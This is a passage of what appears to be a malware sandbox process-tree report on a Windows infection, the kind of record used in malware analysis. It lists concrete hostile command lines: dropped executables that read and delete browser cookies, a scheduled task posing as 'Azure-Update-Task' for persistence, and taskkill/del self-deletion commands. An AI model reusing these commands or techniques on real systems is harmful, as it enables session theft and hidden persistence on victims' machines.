                                                                                  C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                  8⤵
                                                                                    PID:6092
                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5612
                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                    8⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:5288
                                                                                  • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                    C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                    8⤵
                                                                                      PID:5224
                                                                                    • C:\Users\Admin\AppData\Local\Temp\22222.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5456
                                                                                  • C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
                                                                                    "C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    • Checks whether UAC is enabled
                                                                                    PID:3644
                                                                                  • C:\Program Files (x86)\Company\NewProduct\jooyu.exe
                                                                                    "C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
                                                                                    7⤵
                                                                                    • Executes dropped EXE
                                                                                    PID:1036
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4900
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      8⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:5532
                                                                                    • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                      C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                      8⤵
                                                                                        PID:5124
                                                                                      • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                        C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                        8⤵
                                                                                          PID:2716
                                                                                    • C:\Users\Admin\Documents\GVgDeZSBwr79wv034BBysUan.exe
                                                                                      "C:\Users\Admin\Documents\GVgDeZSBwr79wv034BBysUan.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      PID:4888
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 660
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:4752
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 672
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:192
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 704
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:1752
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 708
                                                                                        7⤵
                                                                                        • Program crash
                                                                                        PID:4876
                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 4888 -s 1084
                                                                                        7⤵
                                                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                                                        • Program crash
                                                                                        PID:1752
                                                                                    • C:\Users\Admin\Documents\iz0el3MgbllAgCGC8u7k_NGw.exe
                                                                                      "C:\Users\Admin\Documents\iz0el3MgbllAgCGC8u7k_NGw.exe"
                                                                                      6⤵
                                                                                      • Executes dropped EXE
                                                                                      • Suspicious use of SetThreadContext
                                                                                      PID:4884
                                                                                      • C:\Users\Admin\Documents\iz0el3MgbllAgCGC8u7k_NGw.exe
                                                                                        "{path}"
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:6016
                                                                                      • C:\Users\Admin\Documents\iz0el3MgbllAgCGC8u7k_NGw.exe
                                                                                        "{path}"
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5932
                                                                                      • C:\Users\Admin\Documents\iz0el3MgbllAgCGC8u7k_NGw.exe
                                                                                        "{path}"
                                                                                        7⤵
                                                                                        • Executes dropped EXE
                                                                                        • Loads dropped DLL
                                                                                        • Checks processor information in registry
                                                                                        PID:6060
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im iz0el3MgbllAgCGC8u7k_NGw.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\Documents\iz0el3MgbllAgCGC8u7k_NGw.exe" & del C:\ProgramData\*.dll & exit
                                                                                          8⤵
                                                                                            PID:5832
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /im iz0el3MgbllAgCGC8u7k_NGw.exe /f
                                                                                              9⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:3596
                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                              timeout /t 6
                                                                                              9⤵
                                                                                              • Delays execution with timeout.exe
                                                                                              PID:4104
                                                                                      • C:\Users\Admin\Documents\SXnOhV5UXBhuNRQ1tF0l_IxB.exe
                                                                                        "C:\Users\Admin\Documents\SXnOhV5UXBhuNRQ1tF0l_IxB.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5064
                                                                                        • C:\Users\Admin\Documents\SXnOhV5UXBhuNRQ1tF0l_IxB.exe
                                                                                          "C:\Users\Admin\Documents\SXnOhV5UXBhuNRQ1tF0l_IxB.exe"
                                                                                          7⤵
                                                                                          • Modifies data under HKEY_USERS
                                                                                          PID:5908
                                                                                      • C:\Users\Admin\Documents\Hf6nFyToqLxl1AZKlDRQng_p.exe
                                                                                        "C:\Users\Admin\Documents\Hf6nFyToqLxl1AZKlDRQng_p.exe"
                                                                                        6⤵
                                                                                        • Executes dropped EXE
                                                                                        PID:5052
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 656
                                                                                          7⤵
                                                                                          • Program crash
                                                                                          PID:1316
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 668
                                                                                          7⤵
                                                                                          • Program crash
                                                                                          PID:3972
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 676
                                                                                          7⤵
                                                                                          • Program crash
                                                                                          PID:5028
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 688
                                                                                          7⤵
                                                                                          • Program crash
                                                                                          PID:3076
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 1120
                                                                                          7⤵
                                                                                          • Program crash
                                                                                          PID:4628
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 1144
                                                                                          7⤵
                                                                                          • Program crash
                                                                                          PID:5160
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 1156
                                                                                          7⤵
                                                                                          • Program crash
                                                                                          PID:5308
                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 1196
                                                                                          7⤵
                                                                                          • Program crash
                                                                                          PID:5400
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im "Hf6nFyToqLxl1AZKlDRQng_p.exe" /f & erase "C:\Users\Admin\Documents\Hf6nFyToqLxl1AZKlDRQng_p.exe" & exit
                                                                                          7⤵
                                                                                            PID:5660
                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                              taskkill /im "Hf6nFyToqLxl1AZKlDRQng_p.exe" /f
                                                                                              8⤵
                                                                                              • Kills process with taskkill
                                                                                              PID:5192
                                                                                        • C:\Users\Admin\Documents\0FRecp8hERjeq2xtam675QfW.exe
                                                                                          "C:\Users\Admin\Documents\0FRecp8hERjeq2xtam675QfW.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:1956
                                                                                        • C:\Users\Admin\Documents\6lOXZiJ5ZZFDcv3tt7h5nji4.exe
                                                                                          "C:\Users\Admin\Documents\6lOXZiJ5ZZFDcv3tt7h5nji4.exe"
                                                                                          6⤵
                                                                                          • Executes dropped EXE
                                                                                          PID:4180
                                                                                          • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                            C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                            7⤵
                                                                                              PID:4588
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              7⤵
                                                                                              • Executes dropped EXE
                                                                                              PID:5428
                                                                                            • C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
                                                                                              C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
                                                                                              7⤵
                                                                                                PID:6120
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          C:\Windows\system32\cmd.exe /c sonia_1.exe
                                                                                          4⤵
                                                                                          • Suspicious use of WriteProcessMemory
                                                                                          PID:3056
                                                                                          • C:\Users\Admin\AppData\Local\Temp\7zS829F14A4\sonia_1.exe
                                                                                            sonia_1.exe
                                                                                            5⤵
                                                                                            • Executes dropped EXE
                                                                                            • Suspicious use of WriteProcessMemory
                                                                                            PID:3852
                                                                                            • C:\Users\Admin\AppData\Local\Temp\7zS829F14A4\sonia_1.exe
                                                                                              "C:\Users\Admin\AppData\Local\Temp\7zS829F14A4\sonia_1.exe" -a
                                                                                              6⤵
                                                                                                PID:1956
                                                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 3740 -s 492
                                                                                            4⤵
                                                                                            • Program crash
                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                            PID:2560
                                                                                    • c:\windows\system32\svchost.exe
                                                                                      c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
                                                                                      1⤵
                                                                                        PID:1084
                                                                                      • c:\windows\system32\svchost.exe
                                                                                        c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                                                                                        1⤵
                                                                                        • Drops file in System32 directory
                                                                                        PID:340
                                                                                        • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                          C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                          2⤵
                                                                                          • Executes dropped EXE
                                                                                          • Checks BIOS information in registry
                                                                                          • Checks whether UAC is enabled
                                                                                          • Drops file in System32 directory
                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                          PID:5224
                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                          2⤵
                                                                                          • Suspicious use of SetThreadContext
                                                                                          PID:2276
                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                            3⤵
                                                                                              PID:848
                                                                                              • C:\Windows\SysWOW64\schtasks.exe
                                                                                                /C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
                                                                                                4⤵
                                                                                                • Creates scheduled task(s)
                                                                                                PID:4416
                                                                                          • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                            C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                            2⤵
                                                                                              PID:2720
                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              2⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:5584
                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                3⤵
                                                                                                • Drops file in Program Files directory
                                                                                                PID:5680
                                                                                            • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                              C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                              2⤵
                                                                                              • Checks BIOS information in registry
                                                                                              • Checks whether UAC is enabled
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              PID:6072
                                                                                            • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                              C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                              2⤵
                                                                                              • Checks BIOS information in registry
                                                                                              • Checks whether UAC is enabled
                                                                                              • Drops file in System32 directory
                                                                                              • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                              PID:5892
                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                              2⤵
                                                                                              • Suspicious use of SetThreadContext
                                                                                              PID:5984
                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                3⤵
                                                                                                  PID:4304
                                                                                              • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                2⤵
                                                                                                • Checks BIOS information in registry
                                                                                                • Checks whether UAC is enabled
                                                                                                • Drops file in System32 directory
                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                PID:6120
                                                                                              • C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe
                                                                                                C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe --Task
                                                                                                2⤵
                                                                                                • Suspicious use of SetThreadContext
                                                                                                PID:6084
                                                                                                • C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe
                                                                                                  C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe --Task
                                                                                                  3⤵
                                                                                                    PID:5864
                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                  2⤵
                                                                                                  • Suspicious use of SetThreadContext
                                                                                                  PID:6092
                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                    3⤵
                                                                                                      PID:4628
                                                                                                  • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                    C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                    2⤵
                                                                                                    • Checks BIOS information in registry
                                                                                                    • Checks whether UAC is enabled
                                                                                                    • Drops file in System32 directory
                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                    PID:5752
                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                    2⤵
                                                                                                    • Suspicious use of SetThreadContext
                                                                                                    PID:3948
                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                      3⤵
                                                                                                        PID:4884
                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                      2⤵
                                                                                                      • Checks BIOS information in registry
                                                                                                      • Checks whether UAC is enabled
                                                                                                      • Drops file in System32 directory
                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                      PID:5580
                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                      2⤵
                                                                                                      • Suspicious use of SetThreadContext
                                                                                                      PID:3568
                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        3⤵
                                                                                                          PID:5564
                                                                                                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                        2⤵
                                                                                                        • Checks BIOS information in registry
                                                                                                        • Checks whether UAC is enabled
                                                                                                        • Drops file in System32 directory
                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                        PID:5608
                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                        2⤵
                                                                                                        • Suspicious use of SetThreadContext
                                                                                                        PID:4780
                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                          3⤵
                                                                                                            PID:5692
                                                                                                        • C:\Windows\system32\rundll32.exe
                                                                                                          C:\Windows\system32\rundll32.exe "C:\Program Files (x86)\hdvAaRs\hdvAaRs.dll",hdvAaRs
                                                                                                          2⤵
                                                                                                          • Windows security modification
                                                                                                          • Drops file in System32 directory
                                                                                                          • Modifies data under HKEY_USERS
                                                                                                          PID:4204
                                                                                                        • C:\Users\Admin\AppData\Roaming\djiacuc
                                                                                                          C:\Users\Admin\AppData\Roaming\djiacuc
                                                                                                          2⤵
                                                                                                          • Checks SCSI registry key(s)
                                                                                                          • Suspicious behavior: MapViewOfSection
                                                                                                          PID:5652
                                                                                                        • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                          C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                          2⤵
                                                                                                          • Checks BIOS information in registry
                                                                                                          • Checks whether UAC is enabled
                                                                                                          • Drops file in System32 directory
                                                                                                          • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                          PID:5316
                                                                                                        • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                          C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                          2⤵
                                                                                                          • Suspicious use of SetThreadContext
                                                                                                          PID:2924
                                                                                                          • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                            C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                            3⤵
                                                                                                              PID:3432
                                                                                                          • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                            C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                            2⤵
                                                                                                            • Checks BIOS information in registry
                                                                                                            • Checks whether UAC is enabled
                                                                                                            • Drops file in System32 directory
                                                                                                            • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                            PID:1364
                                                                                                          • C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe
                                                                                                            C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe --Task
                                                                                                            2⤵
                                                                                                            • Suspicious use of SetThreadContext
                                                                                                            PID:5804
                                                                                                            • C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe
                                                                                                              C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe --Task
                                                                                                              3⤵
                                                                                                                PID:1392
                                                                                                            • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                              2⤵
                                                                                                              • Suspicious use of SetThreadContext
                                                                                                              PID:3692
                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                3⤵
                                                                                                                  PID:4464
                                                                                                              • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                2⤵
                                                                                                                • Checks BIOS information in registry
                                                                                                                • Checks whether UAC is enabled
                                                                                                                • Drops file in System32 directory
                                                                                                                • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                PID:5452
                                                                                                              • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                2⤵
                                                                                                                • Suspicious use of SetThreadContext
                                                                                                                PID:4936
                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  3⤵
                                                                                                                    PID:348
                                                                                                                • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                  2⤵
                                                                                                                  • Checks BIOS information in registry
                                                                                                                  • Checks whether UAC is enabled
                                                                                                                  • Drops file in System32 directory
                                                                                                                  • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                  PID:68
                                                                                                                • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                  2⤵
                                                                                                                  • Suspicious use of SetThreadContext
                                                                                                                  PID:6084
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    3⤵
                                                                                                                      PID:3784
                                                                                                                  • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                    2⤵
                                                                                                                    • Checks BIOS information in registry
                                                                                                                    • Checks whether UAC is enabled
                                                                                                                    • Drops file in System32 directory
                                                                                                                    • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                    PID:4584
                                                                                                                  • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                    2⤵
                                                                                                                    • Suspicious use of SetThreadContext
                                                                                                                    PID:5484
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                      3⤵
                                                                                                                        PID:5988
                                                                                                                    • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                      2⤵
                                                                                                                      • Checks BIOS information in registry
                                                                                                                      • Checks whether UAC is enabled
                                                                                                                      • Drops file in System32 directory
                                                                                                                      • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                      PID:5980
                                                                                                                    • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                      C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                      2⤵
                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                      PID:5044
                                                                                                                      • C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                        C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe
                                                                                                                        3⤵
                                                                                                                          PID:5264
                                                                                                                      • C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                        C:\Users\Admin\AppData\Roaming\x86_wpf-presentationhostdll_31bf3856ad364e35_6.1.7601.23403_none_72a612359757f848\urlmon.exe
                                                                                                                        2⤵
                                                                                                                        • Checks BIOS information in registry
                                                                                                                        • Checks whether UAC is enabled
                                                                                                                        • Drops file in System32 directory
                                                                                                                        • Suspicious use of NtSetInformationThreadHideFromDebugger
                                                                                                                        PID:4552
                                                                                                                      • C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe
                                                                                                                        C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe --Task
                                                                                                                        2⤵
                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                        PID:3472
                                                                                                                        • C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe
                                                                                                                          C:\Users\Admin\AppData\Local\3673e4c7-1b26-4124-8d6e-ed80ed3521f0\66D4.exe --Task
                                                                                                                          3⤵
                                                                                                                            PID:4080
